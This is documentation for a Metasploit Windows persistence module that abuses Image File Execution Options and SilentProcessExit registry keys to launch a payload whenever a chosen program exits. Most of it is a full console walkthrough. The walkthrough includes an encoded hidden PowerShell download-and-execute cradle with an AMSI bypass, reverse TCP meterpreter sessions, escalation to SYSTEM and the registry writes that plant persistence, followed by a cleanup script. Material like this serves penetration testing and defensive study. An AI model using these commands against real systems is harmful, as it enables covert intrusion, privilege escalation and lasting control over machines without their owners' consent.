Image Exec Options - Metasploit Framework

Description

This module leverages Windows debugging tools to cause a payload to launch every time a specified binary exits.

The payload will execute at the same priv level as the launched binary.

Vulnerable Target

Windows 7+ as elevated user

Verification Steps

Start msfconsole
Get a shell/meterpreter on a windows box
Do: use exploit/windows/persistence/image_exec_options
Do: set session #
Do: run
You should get persistence once the targeted application is open and closed.

Options

PAYLOAD_NAME

Name of the payload file. Defaults to <random>.exe

IMAGE_FILE

The executable to bind to. Example: calc.exe, notepad.exe

Scenarios

Windows 10

Original Shell

└─$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> run
[-] Exploit failed: cmd/linux/http/x64/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4449 
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABkAG4AbAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABkAG4AbAAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGQAbgBsAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBhAGYAbwBvAFkATwByAGMAYgA5AHEAYgBwAE8ATQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) > 
[*] 2.2.2.2     web_delivery - Delivering AMSI Bypass (1386 bytes)
[*] 2.2.2.2     web_delivery - Powershell command length: 3727
[*] 2.2.2.2     web_delivery - Delivering Payload (3727 bytes)
[*] Sending stage (203846 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:52295) at 2025-09-23 17:10:43 -0400

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...

Persistence

msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/image_exec_options 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/image_exec_options) > set session 1
session => 1
msf exploit(windows/persistence/image_exec_options) > set IMAGE_FILE calc.exe
IMAGE_FILE => calc.exe
msf exploit(windows/persistence/image_exec_options) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/image_exec_options) > rexploit
[*] Reloading module...
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/image_exec_options) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Attempting Persistence on WIN10PROLICENSE via session ID: 1
[*] Payload pathname = C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe
[*] Writing GlobalFlag to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe
[*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe
[*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe
[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc

Open calc.exe on the target machine

[*] Sending stage (177734 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:52327) at 2025-09-23 17:18:33 -0400

msf exploit(windows/persistence/image_exec_options) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> rm C:\Users\windows\AppData\Local\Temp\yoRmhrs.exe
[-] stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /f" -H
Process 7092 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /f" -H
Process 7568 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20250923.1758/WIN10PROLICENSE_20250923.1758.rc)> execute -f cmd.exe -a "/c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /f" -H
Process 2604 created.
meterpreter >